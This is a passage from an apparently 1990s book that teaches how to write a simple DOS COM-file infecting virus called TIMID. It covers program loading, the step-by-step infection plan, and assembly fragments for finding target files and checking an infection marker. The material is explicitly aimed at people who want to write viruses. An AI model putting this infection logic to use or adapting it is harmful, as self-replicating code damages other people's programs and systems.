assembler you decide to use, though, the viruses in this book

can be assembled by all three. Batch files are provided to perform a

correct assembly with each assembler.

If you do not have an assembler, or the resources to buy

one, or the inclination to learn assembly language, the viruses are

provided in Intel hex format so they can be directly loaded onto

your computer in executable form. The program disk also contains

compiled, directly executable versions of each virus. However, if

you don't understand the assembly language source code, please

don't take these programs and run them. You're just asking for

trouble, like a four-year-old child with a loaded gun.

Case Number One:

A Simple COM File Infector

In this chapter we will discuss one of the simplest of all

computer viruses. This virus is very small, comprising only 264

bytes of machine language instructions. It is also fairly safe, because

it has one of the simplest search routines possible. This virus,

which we will call TIMID, is designed to only infect COM files

which are in the currently logged directory on the computer. It does

not jump across directories or drives, if you don't call it from

another directory, so it can be easily contained. It is also harmless

because it contains no destructive code, and it tells you when it is

infecting a new file, so you will know where it is and where it has

gone. On the other hand, its extreme simplicity means that this is

not a very effective virus. It will not infect most files, and it can

easily be caught. Still, this virus will introduce all the essential

concepts necessary to write a virus, with a minimum of complexity

and a minimal risk to the experimenter. As such, it is an excellent

instructional tool.

Some DOS Basics

To understand the means by which the virus copies itself

from one program to another, we have to dig into the details of how

the operating system, DOS, loads a program into memory and

passes control to it. The virus must be designed so its code gets

executed, rather than just the program it has attached itself to. Only

then can it reproduce. Then, it must be able to pass control back to

the host program, so the host can execute in its entirety as well.

When one enters the name of a program at the DOS prompt,

DOS begins looking for files with that name and an extent of

``COM''. If it finds one it will load the file into memory and execute

it. Otherwise DOS will look for files with the same name and an

extent of ``EXE'' to load and execute. If no EXE file is found, the

operating system will finally look for a file with the extent ``BAT''

to execute. Failing all three of these possibilities, DOS will display

the error message ``Bad command or file name.''
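The lookup order just described can be modeled in a few lines. This is only an illustrative sketch in Python, not DOS code: the function name `resolve_command` and the in-memory list of file names are assumptions made for the example, and the real command interpreter also searches the directories on the PATH.

```python
# Illustrative model of the lookup order described in the text.
# resolve_command and the file list are hypothetical, not DOS internals.
SEARCH_ORDER = ("COM", "EXE", "BAT")


def resolve_command(name, files):
    """Return the file that would be chosen for `name`, or None."""
    available = {f.upper() for f in files}
    for extent in SEARCH_ORDER:
        candidate = f"{name.upper()}.{extent}"
        if candidate in available:
            return candidate
    return None  # DOS would report "Bad command or file name"


if __name__ == "__main__":
    directory = ["EDIT.EXE", "EDIT.COM", "SETUP.BAT", "TRUE.TXT"]
    for command in ("edit", "setup", "true"):
        print(command, "->", resolve_command(command, directory))
```

With both EDIT.COM and EDIT.EXE present, the COM file wins, which is the behavior the paragraph above describes.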

EXE and COM files are directly executable by the Central

Processing Unit. Of these two types of program files, COM files

are much simpler. They have a predefined segment format which

is built into the structure of DOS, while EXE files are designed to

handle a user defined segment format, typical of very large and

complicated programs. The COM file is a direct binary image of

what should be put into memory and executed by the CPU, but an

EXE file is not.

To execute a COM file, DOS must do some preparatory

work before giving that program control. Most importantly, DOS

controls and allocates memory usage in the computer. So first it

checks to see if there is enough room in memory to load the

program. If it can, DOS then allocates the memory required for the

program. This step is little more than an internal housekeeping

function. DOS simply records how much space it is making available

for such and such a program, so it won't try to load another

program on top of it later, or give memory space to the program

that would conflict with another program. Such a step is necessary

because more than one program may reside in memory at any given

time. For example, pop-up, memory-resident programs can remain

in memory, and parent programs can load child programs into

memory, which execute and then return control to the parent.

Next, DOS builds a block of memory 256 bytes long

known as the Program Segment Prefix, or PSP. The PSP is a

remnant of an older operating system known as CP/M. CP/M was

popular in the late seventies and early eighties as an operating

system for microcomputers based on the 8080 and Z80 microprocessors.

In the CP/M world, 64 kilobytes was all the memory a

computer had. The lowest 256 bytes of that memory was reserved

for the operating system itself to store crucial data. For example,

location 5 in memory contained a jump instruction to get to the rest

of the operating system, which was stored in high memory, and its

location differed according to how much memory the computer

had. Thus, programs written for these machines would access the

operating system functions by calling location 5 in memory. When

PC-DOS came along, it imitated CP/M because CP/M was very

popular, and many programs had been written to work with it. So

the PSP (and whole COM file concept) became a part of DOS. The

result is that a lot of the information stored in the PSP is of little

use to a DOS programmer today. Some of it is useful though, as we

will see a little later.

Offset  Size  Description
0H      2     Int 20H Instruction
2H      2     Address of Last allocated segment
4H      1     Reserved, should be zero
5H      5     Far call to DOS function dispatcher
AH      4     Int 22H vector (Terminate program)
EH      4     Int 23H vector (Ctrl-C handler)
12H     4     Int 24H vector (Critical error handler)
16H     22    Reserved
2CH     2     Segment of DOS environment
2EH     34    Reserved
50H     3     Int 21H / RETF instruction
53H     9     Reserved
5CH     16    File Control Block 1
6CH     20    File Control Block 2
80H     128   Default DTA (command line at startup)
100H          Beginning of COM program

Figure 2: Format of the Program Segment Prefix.
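To make the offsets in Figure 2 concrete, here is a minimal Python sketch that builds a made-up 256 byte PSP image and reads a few fields back by offset. The helper names `make_sample_psp` and `read_psp` and all segment values are invented for illustration. The sketch also assumes the usual DOS convention that the byte at 80H holds the length of the command line text, which begins at 81H and ends with a carriage return; Figure 2 itself only says the command line is stored there.

```python
import struct

PSP_SIZE = 0x100  # 256 bytes; the COM image begins right after it


def make_sample_psp(command_tail: bytes) -> bytes:
    """Build a fake PSP image for demonstration (all values invented)."""
    if len(command_tail) > 126:
        raise ValueError("command tail too long for the 128-byte area")
    psp = bytearray(PSP_SIZE)
    psp[0x00:0x02] = b"\xCD\x20"               # opcode bytes of INT 20H
    struct.pack_into("<H", psp, 0x02, 0x9FFF)  # made-up last segment
    struct.pack_into("<H", psp, 0x2C, 0x1234)  # made-up environment segment
    psp[0x80] = len(command_tail)              # length byte (assumed layout)
    psp[0x81:0x81 + len(command_tail)] = command_tail
    psp[0x81 + len(command_tail)] = 0x0D       # terminating carriage return
    return bytes(psp)


def read_psp(psp: bytes) -> dict:
    """Pull a few Figure 2 fields out of a 256-byte PSP image."""
    if len(psp) != PSP_SIZE:
        raise ValueError("a PSP is exactly 256 bytes long")
    tail_length = psp[0x80]
    return {
        "int20": psp[0x00:0x02],
        "last_segment": struct.unpack_from("<H", psp, 0x02)[0],
        "environment_segment": struct.unpack_from("<H", psp, 0x2C)[0],
        "command_tail": psp[0x81:0x81 + tail_length].decode("ascii"),
    }


if __name__ == "__main__":
    for key, value in read_psp(make_sample_psp(b" /X FILE.TXT")).items():
        print(key, "=", value)
```

The two-byte fields are read as little-endian words, which is how the 8088 stores 16 bit values in memory.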

Once the PSP is built, DOS takes the COM file stored on

disk and loads it into memory just above the PSP, starting at offset

100H. Once this is done, DOS is almost ready to pass control to the

program. Before it does, though, it must set up the registers in the

CPU to certain predetermined values. First, the segment registers

must be set properly, or a COM program cannot run. Let's take a

look at the how's and why's of these segment registers.

In the 8088 microprocessor, all registers are 16-bit registers.

The problem is that a 16-bit register will only allow one to

address 64 kilobytes of memory. If you want to use more memory,

you need more bits to address it. The 8088 can address up to one

megabyte of memory using a process known as segmentation. It

uses two registers to create a physical memory address that is 20

bits long instead of just 16. Such a register pair consists of a segment

register, which contains the most significant bits of the address, and

an offset register, which contains the least significant bits. The

segment register points to a 16 byte block of memory, and the offset

register tells how many bytes to add to the start of the 16 byte block

to locate the desired byte in memory. For example, if the ds register

is set to 1275 Hex and the bx register is set to 457 Hex, then the

physical 20 bit address of the byte ds:[bx] is

    1275H x 10H = 12750H
                +   457H
                  ------
                  12BA7H

No offset should ever have to be larger than 15, but one

normally uses values up to the full 64 kilobyte range of the offset

register. This leads to the possibility of writing a single physical

address in several different ways. For example, setting ds = 12BA

Hex and bx = 7 would produce the same physical address 12BA7

Hex as in the example above. The proper choice is simply whatever

is convenient for the programmer. However, it is standard programming

practice to set the segment registers and leave them alone as

much as possible, using offsets to range through as much data and

code as one can (64 kilobytes if necessary).
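The segment arithmetic above can be checked with a short Python sketch. The function names `physical_address` and `normalize` are hypothetical, chosen only for this illustration; the calculation itself is the one in the text, a multiplication of the segment by 10H followed by adding the offset.

```python
def physical_address(segment: int, offset: int) -> int:
    """20-bit physical address formed by an 8088 segment:offset pair."""
    if not (0 <= segment <= 0xFFFF and 0 <= offset <= 0xFFFF):
        raise ValueError("segment and offset must each fit in 16 bits")
    # Shifting left by 4 bits is the multiplication by 10H in the text.
    # The mask keeps the result within the 8088's 20 address bits.
    return ((segment << 4) + offset) & 0xFFFFF


def normalize(address: int) -> tuple:
    """Rewrite a physical address with the smallest offset (0 to 15)."""
    return address >> 4, address & 0xF


if __name__ == "__main__":
    print(hex(physical_address(0x1275, 0x457)))
    print(hex(physical_address(0x12BA, 0x7)))
    print([hex(part) for part in normalize(0x12BA7)])
```

Both calls to `physical_address` give 12BA7 Hex, which shows that the pairs 1275:0457 and 12BA:0007 name the same byte, and `normalize` recovers the form whose offset is no larger than 15.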

The 8088 has four segment registers, cs, ds, ss and es,

which stand for Code Segment, Data Segment, Stack Segment, and

Extra Segment, respectively. They each serve different purposes.

The cs register specifies the 64K segment where the actual program

instructions which are executed by the CPU are located. The Data

Segment is used to specify a segment to put the program's data in,

and the Stack Segment specifies where the program's stack is

located. The es register is available as an extra segment register for

the programmer's use. It might typically be used to point to the

video memory segment, for writing data directly to video, etc.

COM files are designed to operate with a very simple, but

limited segment structure: namely, they have one segment,

cs=ds=es=ss. All data is stored in the same segment as the program

code itself, and the stack shares this segment. Since any given

segment is 64 kilobytes long, a COM program can use at most 64

kilobytes for all of its code, data and stack. When PC's were first

introduced, everybody was used to writing programs limited to 64

kilobytes, and that seemed like a lot of memory. However, today it

is not uncommon to find programs that require several hundred

kilobytes of code, and maybe as much data. Such programs must

use a more complex segmentation scheme than the COM file format

allows. The EXE file structure is designed to handle that complexity.

The drawback with the EXE file is that the program code which

is stored on disk must be modified significantly before it can be

executed by the CPU. DOS does that at load time, and it is

completely transparent to the user, but a virus that attaches to EXE

files must not upset DOS during this modification process, or it

won't work. A COM program doesn't require this modification

process because it uses only one segment for everything. This

makes it possible to store a straight binary image of the code to be

executed on disk (the COM file). When it is time to run the program,

DOS only needs to set up the segment registers properly and

execute it.

The PSP is set up at the beginning of the segment allocated

for the COM file, i.e. at offset 0. DOS picks the segment based on

what free memory is available, and puts the PSP at the very start of

that segment. The COM file itself is loaded at offset 100 Hex, just

after the PSP. Once everything is ready, DOS transfers control to

the beginning of the program by jumping to the offset 100 Hex in

the code segment where the program was loaded. From there on,

the program runs, and it accesses DOS occasionally, as it sees fit,

to perform various I/O functions, like reading and writing to disk.

When the program is done, it transfers control back to DOS, and

DOS releases the memory reserved for that program and gives the

user another command line prompt.

An Outline for a Virus

In order for a virus to reside in a COM file, it must get

control passed to its code at some point during the execution of the

program. It is conceivable that a virus could examine a COM file

and determine how it might wrest control from the program at any

point during its execution. Such an analysis would be very difficult,

though, for the general case, and the resulting virus would be

anything but simple. By far the easiest point to take control is right

at the very beginning, when DOS jumps to the start of the program.

Figure 3: Memory map just before executing a COM file. (With

cs=ds=es=ss, the segment runs from offset 0H to FFFFH: the PSP at

0H, the COM file image at 100H where ip points, uninitialized data

above the image, and the stack area at the top where sp points.)

At this time, the virus is completely free to use any space above the

image of the COM file which was loaded into memory by DOS.

Since the program itself has not yet executed, it cannot have set up

data anywhere in memory, or moved the stack, so this is a very safe

time for the virus to operate. At this stage, it isn't too difficult a task

to make sure that the virus will not interfere with the host program

to damage it or render it inoperative. Once the host program begins

to execute, almost anything can happen, though, and the virus's job

becomes much more difficult.

To gain control at startup time, a virus infecting a COM

file must replace the first few bytes in the COM file with a jump to

the virus code, which can be appended at the end of the COM file.

Then, when the COM file is executed, it jumps to the virus, which

goes about looking for more files to infect, and infecting them.

When the virus is ready, it can return control to the host program.

The problem in doing this is that the virus already replaced the first

few bytes of the host program with its own code. Thus it must

restore those bytes, and then jump back to offset 100 Hex, where

the original program begins.

Figure 4: Replacing the first bytes in a COM file. (BEFORE: the

uninfected host COM file begins at 100H with mov dx,257H. AFTER:

the infected host COM file begins at 100H with jmp 154AH, followed

by the TIMID virus, which holds the original mov dx,257H.)

Here, then, is the basic plan for a simple viral infection of

a COM file. Imagine a virus sitting in memory, which has just been

activated. It goes out and infects another COM file with itself. Step

by step, it might work like this:

1. An infected COM file is loaded into memory and

executed. The viral code gets control first.

2. The virus in memory searches the disk to find a

suitable COM file to infect.

3. If a suitable file is found, the virus appends its own

code to the end of the file.

4. Next, it reads the first few bytes of the file into

memory, and writes them back out to the file in a

special data area within the virus' code. The new virus

will need these bytes when it executes.

5. Next the virus in memory writes a jump instruction to

the beginning of the file it is infecting, which will pass

control to the new virus when its host program is

executed.

6. Then the virus in memory takes the bytes which were

originally the first bytes in its host, and puts them back

(at offset 100H).

7. Finally, the viral code jumps to offset 100 Hex and

allows its host program to execute.

Ok. So let's develop a real virus with these specifications. We will

need both a search mechanism and a copy mechanism.

The Search Mechanism

To understand how a virus searches for new files to infect
on an IBM PC style computer operating under MS-DOS or PC-DOS,
it is important to understand how DOS stores files and
information about them. All of the information about every file on
disk is stored in two areas on disk, known as the directory and the
File Allocation Table, or FAT for short. The directory contains a
32-byte file descriptor record for each file. This descriptor record
contains the file's name and extent, its size, date and time of
creation, and the file attribute, which contains essential information
for the operating system about how to handle the file. The FAT is a
map of the entire disk, which simply informs the operating system
which areas are occupied by which files.

Figure 5: The directory entry record format.

The Directory Entry (32 bytes)
   Bytes 0 to 0FH:    File Name, Attr, Reserved
   Bytes 10H to 1FH:  Reserved, Time, Date, First Cluster, File Size

The Attribute Field (bit 7 down to bit 0)
   Reserved, Reserved, Archive, Subdirectory, Volume label, System, Hidden, Read-only

The Time Field (bit 15 down to bit 0)
   Hours (0-23), Minutes (0-59), Two Second Increments (0-29)

The Date Field (bit 15 down to bit 0)
   Year (Relative to 1980), Month (1-12), Day (1-31)

Each disk has two FATs, which are identical copies of each

other. The second is a backup, in case the first gets corrupted. On

the other hand, a disk may have many directories. One directory,

known as the root directory, is present on every disk, but the root

may have multiple subdirectories, nested one inside of another to

form a tree structure. These subdirectories can be created, used, and

removed by the user at will. Thus, the tree structure can be as simple

or as complex as the user has made it.

Both the FAT and the root directory are located in a fixed

area of the disk, reserved especially for them. Subdirectories are

stored just like other files with the file attribute set to indicate that

this file is a directory. The operating system then handles this

subdirectory file in a completely different manner than other files

to make it look like a directory, and not just another file. The

subdirectory file simply consists of a sequence of 32-byte records

describing the files in that directory. It may contain a 32-byte record

with the attribute set to directory, which means that this file is a

subdirectory of a subdirectory.
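To make the record layout concrete, here is a minimal sketch in Python (used purely for illustration; it is not part of the assembly code developed in this chapter) that splits a 32-byte directory record into its fields and unpacks the attribute, time and date bits. The field order follows the directory entry figure and the standard FAT directory format. The function names and the hand-built sample record are assumptions made for the demonstration.

```python
import struct

# Attribute bits, bit 0 first, as laid out in the attribute field.
ATTR_NAMES = ["read-only", "hidden", "system", "volume label",
              "subdirectory", "archive"]


def decode_time(word):
    """Unpack a 16-bit time word into (hours, minutes, seconds)."""
    return (word >> 11) & 0x1F, (word >> 5) & 0x3F, (word & 0x1F) * 2


def decode_date(word):
    """Unpack a 16-bit date word into (year, month, day)."""
    return 1980 + ((word >> 9) & 0x7F), (word >> 5) & 0x0F, word & 0x1F


def parse_dir_entry(record):
    """Split one 32-byte directory record into named fields."""
    if len(record) != 32:
        raise ValueError("a directory record is exactly 32 bytes long")
    # name(8) ext(3) attr(1) reserved(10) time(2) date(2) cluster(2) size(4)
    name, ext, attr, _reserved, time_w, date_w, cluster, size = struct.unpack(
        "<8s3sB10sHHHI", record)
    return {
        "name": name.decode("ascii").rstrip(),
        "ext": ext.decode("ascii").rstrip(),
        "attributes": [n for bit, n in enumerate(ATTR_NAMES)
                       if attr & (1 << bit)],
        "time": decode_time(time_w),
        "date": decode_date(date_w),
        "first_cluster": cluster,
        "size": size,
    }


# Hypothetical sample record, built by hand for this demonstration.
sample = struct.pack("<8s3sB10sHHHI", b"HYPER   ", b"EXE", 0x20,
                     bytes(10), 0x9816, 0x1330, 2, 25276)
entry = parse_dir_entry(sample)
print(entry)
```

A subdirectory record would be recognized in the same way: its attribute list would contain "subdirectory".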

The DOS operating system normally controls all access to

files and subdirectories. If one wants to read or write to a file, he

does not write a program that locates the correct directory on the

disk, reads the file descriptor records to find the right one, figures

out where the file is and reads it. Instead of doing all of this work,

he simply gives DOS the directory and name of the file and asks it

to open the file. DOS does all the grunt work. This saves a lot of

time in writing and debugging programs. One simply does not have

to deal with the intricate details of managing files and interfacing

with the hardware.

DOS is told what to do using interrupt service routines

(ISRs). Interrupt 21H is the main DOS interrupt service routine

that we will use. To call an ISR, one simply sets up the required

CPU registers with whatever values the ISR needs to know what to

do, and calls the interrupt. For example, the code

        mov     ax,SEG FNAME        ;ds:dx points to filename
        mov     ds,ax               ;(ds cannot be loaded with an immediate value)
        mov     dx,OFFSET FNAME
        xor     al,al               ;al=0
        mov     ah,3DH              ;DOS function 3D
        int     21H                 ;go do it

opens a file whose name is stored in the memory location FNAME

in preparation for reading it into memory. This function tells DOS

to locate the file and prepare it for reading. The ``int 21H'' instruction

transfers control to DOS and lets it do its job. When DOS is

finished opening the file, control returns to the statement immediately

after the ``int 21H''. The register ah contains the function

number, which DOS uses to determine what you are asking it to do.

The other registers must be set up differently, depending on what

ah is, to convey more information to DOS about what it is supposed

to do. In the above example, the ds:dx register pair is used to point

to the memory location where the name of the file to open is stored.

The register al tells DOS to open the file for reading only.

All of the various DOS functions, including how to set up

all the registers, are detailed in many books on the subject. Peter

Norton's Programmer's Guide to the IBM PC is one of the better

ones, so if you don't have that information readily available, I

suggest you get a copy. Here we will only discuss the DOS

functions we need, as we need them. This will probably be enough

to get by. However, if you are going to write viruses of your own,

it is definitely worthwhile knowing about all of the various functions

you can use, as well as the finer details of how they work and

what to watch out for.

To write a routine which searches for other files to infect,

we will use the DOS search functions. The people who wrote DOS

knew that many programs (not just viruses) require the ability to

look for files and operate on them if any of the required type are

found. Thus, they incorporated a pair of searching functions into

the interrupt 21H handler, called Search First and Search Next.

These are some of the more complicated DOS functions, so they

require the user to do a fair amount of preparatory work before he

calls them. The first step is to set up an ASCIIZ string in memory

to specify the directory to search, and what files to search for. This

is simply an array of bytes terminated by a null byte (0). DOS can

search and report on either all the files in a directory or a subset of

files which the user can specify by file attribute and by specifying

a file name using the wildcard characters ``?'' and ``*'', which you

should be familiar with from executing commands like copy *.* a:

and dir a???_100.* from the command line in DOS. (If not, a basic

book on DOS will explain this syntax.) For example, the ASCIIZ

string

DB '\system\hyper.*',0

will set up the search function to search for all files with the name

hyper, and any possible extent, in the subdirectory named system.

DOS might find files like hyper.c, hyper.prn, hyper.exe, etc.

After setting up this ASCIIZ string, one must set the

registers ds and dx up to the segment and offset of this ASCIIZ

string in memory. Register cl must be set to a file attribute mask

which will tell DOS which file attributes to allow in the search, and

which to exclude. The logic behind this attribute mask is somewhat

complex, so you might want to study it in detail in Appendix G.

Finally, to call the Search First function, one must set ah = 4E Hex.

If the search first function is successful, it returns with

register al = 0, and it formats 43 bytes of data in the Disk Transfer

Area, or DTA. This data provides the program doing the search with

the name of the file which DOS just found, its attribute, its size and

its date of creation. Some of the data reported in the DTA is also

used by DOS for performing the Search Next function. If the search

cannot find a matching file, DOS returns al nonzero, with no data

in the DTA. Since the calling program knows the address of the

DTA, it can go examine that area for the file information after DOS

has stored it there.

To see how this function works more clearly, let us consider

an example. Suppose we want to find all the files in the currently

logged directory with an extent ``COM'', including hidden and

system files. The assembly language code to do the Search First

would look like this (assuming ds is already set up correctly):

SRCH_FIRST:
        mov     dx,OFFSET COMFILE   ;set offset of asciiz string
        mov     cl,00000110B        ;set hidden and system attributes
        mov     ah,4EH              ;search first function
        int     21H                 ;call DOS
        or      al,al               ;check to see if successful
        jnz     NOFILE              ;go handle no file found condition
FOUND:                              ;come here if file found

COMFILE DB      '*.COM',0

If this routine executed successfully, the DTA might look like this:

03 3F 3F 3F 3F 3F 3F 3F 3F 43 4F 4D 06 18 00 00   .????????COM....
00 00 00 00 00 00 16 98 30 13 BC 62 00 00 43 4F   ........0..b..CO
4D 4D 41 4E 44 2E 43 4F 4D 00 00 00 00 00 00 00   MMAND.COM.......

when the program reaches the label FOUND. In this case the search

found the file COMMAND.COM.
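To see where the file information sits inside those 43 bytes, the dump can be pulled apart with a few lines of Python. This is only a sketch: the offsets used (attribute at 15H, time at 16H, date at 18H, a 32-bit size at 1AH and a 13-byte ASCIIZ name at 1EH) are the commonly documented DTA layout for the search functions rather than something spelled out in the text above, and the function name is hypothetical.

```python
import struct

# The DTA dump shown in the text, copied byte for byte.
DTA_HEX = """
03 3F 3F 3F 3F 3F 3F 3F 3F 43 4F 4D 06 18 00 00
00 00 00 00 00 00 16 98 30 13 BC 62 00 00 43 4F
4D 4D 41 4E 44 2E 43 4F 4D 00 00 00 00 00 00 00
"""


def parse_dta(dta):
    """Extract the file information from the first 43 bytes of a DTA."""
    # 21 bytes reserved for DOS, then attribute, time, date, size, name.
    _reserved, attr, time_w, date_w, size, raw_name = struct.unpack(
        "<21sBHHI13s", dta[:43])
    name = raw_name.split(b"\x00", 1)[0].decode("ascii")
    return {"attribute": attr, "time": time_w, "date": date_w,
            "size": size, "name": name}


dta = bytes.fromhex("".join(DTA_HEX.split()))
info = parse_dta(dta)
print(info["name"], info["size"])
```

The first 21 bytes are the part DOS keeps for its own use between Search First and Search Next. In this dump they visibly hold the search pattern (????????COM) and the attribute mask 06.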

In comparison with the Search First function, the Search

Next is easy, because all of the data has already been set up by the

Search First. Just set ah = 4F hex and call DOS interrupt 21H:

mov ah,4FH ;search next function

int 21H ;call DOS

or al,al ;see if a file was found

jnz NOFILE ;no, go handle no file found

FOUND2: ;else process the file

If another file is found the data in the DTA will be updated with the

new file name, and al will be set to zero on return. If no more

matches are found, DOS will set al to something besides zero on

return. One must be careful here so the data in the DTA is not altered

between the call to Search First and later calls to Search Next,

because the Search Next expects the data from the last search call

to be there.

Of course, the computer virus does not need to search

through all of the COM files in a directory. It must find one that

will be suitable to infect, and then infect it. Let us imagine a

procedure FILE_OK. Given the name of a file on disk, it will

determine whether that file is good to infect or not. If it is infectable,

FILE_OK will return with the zero flag, z, set, otherwise it will

return with the zero flag reset. We can use this flag to determine

whether to continue searching for other files, or whether we should

go infect the one we have found.

If our search mechanism as a whole also uses the z flag to

tell the main controlling program that it has found a file to infect

(z=file found, nz=no file found) then our completed search function

can be written like this:

FIND_FILE:
        mov     dx,OFFSET COMFILE
        mov     cl,00000110B
        mov     ah,4EH              ;perform search first
        int     21H
FF_LOOP:
        or      al,al               ;any possibilities found?
        jnz     FF_DONE             ;no - exit with z reset
        call    FILE_OK             ;yes, go check if we can infect it
        jz      FF_DONE             ;yes - exit with z set
        mov     ah,4FH              ;no - search for another file
        int     21H
        jmp     FF_LOOP             ;go back up and see what happened
FF_DONE:
        ret                         ;return to main virus control routine

Figure 6: Logic of the file search routine. (Flowchart: set up the search spec (*.COM, hidden and system files OK); search for the first matching file; if no file is found, exit with no file; if a file is found, test whether the file is OK; if yes, exit with file found; if no, search for the next file and repeat the test.)

Study this search routine carefully. It is important to understand

if you want to write computer viruses, and more generally,

it is useful in a wide variety of programs of all kinds.

Of course, for our virus to work correctly, we have to write

the FILE_OK function which determines whether a file should be

infected or left alone. This function is particularly important to the

success or failure of the virus, because it tells the virus when and

where to move. If it tells the virus to infect a program which does

not have room for the virus, then the newly infected program may

be inadvertently ruined. Or if FILE_OK cannot tell whether a

program has already been infected, it will tell the virus to go ahead

and infect the same file again and again and again. Then the file

will grow larger and larger, until there is no more room for an

infection. For example, the routine

FILE_OK:

xor al,al

ret

simply sets the z flag and returns. If our search routine used this

subroutine, it would always stop and say that the first COM file it

found was the one to infect. The result would be that the first COM

program in a directory would be the only program that would ever

get infected. It would just keep getting infected again and again,

and growing in size, until it exceeded its size limit and crashed. So

although the above example of FILE_OK might enable the virus to

infect at least one file, it would not work well enough for the virus

to be able to start jumping from file to file.

A good FILE_OK routine must perform two checks: (1) it

must check a file to see if it is too long to attach the virus to, and

(2) it must check to see if the virus is already there. If the file is

short enough, and the virus is not present, FILE_OK should return

a ``go ahead'' to the search routine.

On entry to FILE_OK, the search function has set up the

DTA with 43 bytes of information about the file to check, including

its size and its name. Suppose that we have defined two labels,

FSIZE and FNAME in the DTA to access the file size and file name

respectively. Then checking the file size to see if the virus will fit

is a simple matter. Since the file size of a COM file is always less

than 64 kilobytes, we may load the size of the file we want to infect

into the ax register:

mov ax,WORD PTR [FSIZE]

Next we add the number of bytes the virus will have to add

to this file, plus 100H. The 100H is needed because DOS will also

allocate room for the PSP, and load the program file at offset 100H.

To determine the number of bytes the virus will need automatically,

we simply put a label VIRUS at the start of the virus code we are

writing and a label END_VIRUS at the end of it, and take the

difference. If we add these bytes to ax, and ax overflows, then the

file which the search routine has found is too large to permit a

successful infection. An overflow will cause the carry flag c to be

set, so the file size check will look something like this:

FILE_OK:

mov ax,WORD PTR [FSIZE]

add ax,OFFSET END_VIRUS - OFFSET VIRUS + 100H

jc BAD_FILE

.

.

.

GOOD_FILE:

xor al,al

ret

BAD_FILE:

mov al,1

or al,al

ret

This routine will suffice to prevent the virus from infecting any file

that is too large.
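The carry test is nothing more than 16-bit arithmetic, and it can be checked by hand or with a short Python sketch. The helper names and the figure of 300 bytes of added code are hypothetical, chosen only to give the arithmetic something to work on.

```python
def add16(a, b):
    """Add two values the way a 16-bit register does; return (result, carry)."""
    total = a + b
    return total & 0xFFFF, total > 0xFFFF


def fits_in_segment(file_size, extra_bytes):
    """True if file_size + extra_bytes + 100H still fits in 16 bits."""
    _, carry = add16(file_size, extra_bytes + 0x100)
    return not carry


# 25276 + 300 + 256 = 25832, well inside one 64K segment.
print(fits_in_segment(25276, 300))
# 65000 + 300 + 256 = 65556, which wraps past FFFF Hex and sets carry.
print(fits_in_segment(65000, 300))
print(add16(65000, 556))
```

When the sum wraps around, the result left in the register is small and meaningless, which is why the routine looks at the carry flag rather than at ax itself.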

The next problem that the FILE_OK routine must deal with

is how to avoid infecting a file that has already been infected. This

can only be accomplished if the virus has some understanding of

how it goes about infecting a file. In the TIMID virus, we have

decided to replace the first few bytes of the host program with a

jump to the viral code. Thus, the FILE_OK procedure can go out

and read the file which is a candidate for infection to determine

whether its first instruction is a jump. If it isn't, then the virus

obviously has not infected that file yet. There are two kinds of jump

instructions which might be encountered in a COM file, known as

a near jump and a short jump. The virus we create here will always

use a near jump to gain control when the program starts. Since a

short jump only has a range of 128 bytes, we could not use it to

infect a COM file larger than 128 bytes. The near jump allows a

range of 64 kilobytes. Thus it can always be used to jump from the

beginning of a COM file to the virus, at the end of the program, no

matter how big the COM file is (as long as it is really a valid COM

file). A near jump is represented in machine language with the byte

E9 Hex, followed by two bytes which tell the CPU how far to jump.

Thus, our first test to see if infection has already occurred is to check

to see if the first byte in the file is E9 Hex. If it is anything else, the

virus is clear to go ahead and infect.

Looking for E9 Hex is not enough though. Many COM files

are designed so the first instruction is a jump to begin with. Thus

the virus may encounter files which start with an E9 Hex even

though they have never been infected. The virus cannot assume that

a file has been infected just because it starts with an E9. It must go

farther. It must have a way of telling whether a file has been infected

even when it does start with E9. If we do not incorporate this extra

step into the FILE_OK routine, the virus will pass by many good

COM files which it could infect because it thinks they have already

been infected. While failure to incorporate such a feature into

FILE_OK will not cause the virus to fail, it will limit its functionality.

One way to make this test simple and yet very reliable is

to change a couple more bytes than necessary at the beginning of

the host program. The near jump will require three bytes, so we

might take two more, and encode them in a unique way so the virus

can be pretty sure the file is infected if those bytes are properly

encoded. The simplest scheme is to just set them to some fixed

value. We'll use the two characters ``VI'' here. Thus, when a file

begins with a near jump followed by the bytes ``V''=56H and

``I''=49H, we can be almost positive that the virus is there, and

otherwise it is not. Granted, once in a great while the virus will

discover a COM file which is set up with a jump followed by ``VI''

even though it hasn't been infected. The chances of this occurring

are so small, though, that it will be no great loss if the virus fails to

infect this rare one file in a million. It will infect everything else.
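The same two-part test is what a simple scanner would apply to decide whether a COM file carries this marker. The following Python sketch classifies the first five bytes of a file. The function name and the three sample byte strings are hypothetical. Note that the word 4956H is stored low byte first, so on disk it appears as 56H, 49H, which is ``VI''.

```python
def classify_start(first5):
    """Classify the first five bytes of a COM file by the E9 / 'VI' test."""
    if len(first5) < 5:
        return "too short"
    if first5[0] != 0xE9:
        return "no near jump"
    # Bytes 3 and 4 read as a little-endian word: 'V'=56H, 'I'=49H -> 4956H.
    marker = int.from_bytes(first5[3:5], "little")
    if marker == 0x4956:
        return "marked"
    return "near jump, unmarked"


print(classify_start(bytes([0xE9, 0x47, 0x14, 0x56, 0x49])))  # jump plus 'VI'
print(classify_start(bytes([0xBA, 0x57, 0x02, 0x90, 0x90])))  # starts with mov dx
print(classify_start(bytes([0xE9, 0x00, 0x10, 0x00, 0x00])))  # ordinary jump
```

Only the first case would be treated as already infected. The third shows a program that merely begins with a jump of its own.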

To read the first five bytes of the file, we open it with DOS

Interrupt 21H function 3D Hex. This function requires us to set

ds:dx to point to the file name (FNAME) and to specify the access

rights which we desire in the al register. In the FILE_OK routine

the virus only needs to read the file. Yet there we will try to open it

with read/write access, rather than read-only access. If the file

attribute is set to read-only, an attempt to open in read/write mode

will result in an error (which DOS signals by setting the carry flag

on return from INT 21H). This will allow the virus to detect

read-only files and avoid them, since the virus must write to a file

to infect it. It is much better to find out that the file is read-only

here, in the search routine, than to assume the file is good to infect

and then have the virus fail when it actually attempts infection.

Thus, when opening the file, we set al = 2 to tell DOS to open it in

read/write mode. If DOS opens the file successfully, it returns a file

handle in ax. This is just a number which DOS uses to refer to the

file in all future requests. The code to open the file looks like this:

mov ax,3D02H

mov dx,OFFSET FNAME

int 21H

jc BAD_FILE

Figure 7: The file handle and file pointer. (The program in RAM holds a file handle, here 6. DOS, also in RAM, keeps the file pointer for that handle, here 723H, which marks a position in the physical file on disk.)

Once the file is open, the virus may perform the actual read

operation, DOS function 3F Hex. To read a file, one must set bx

equal to the file handle number and cx to the number of bytes to

read from the file. Also ds:dx must be set to the location in memory

where the data read from the file should be stored (which we will

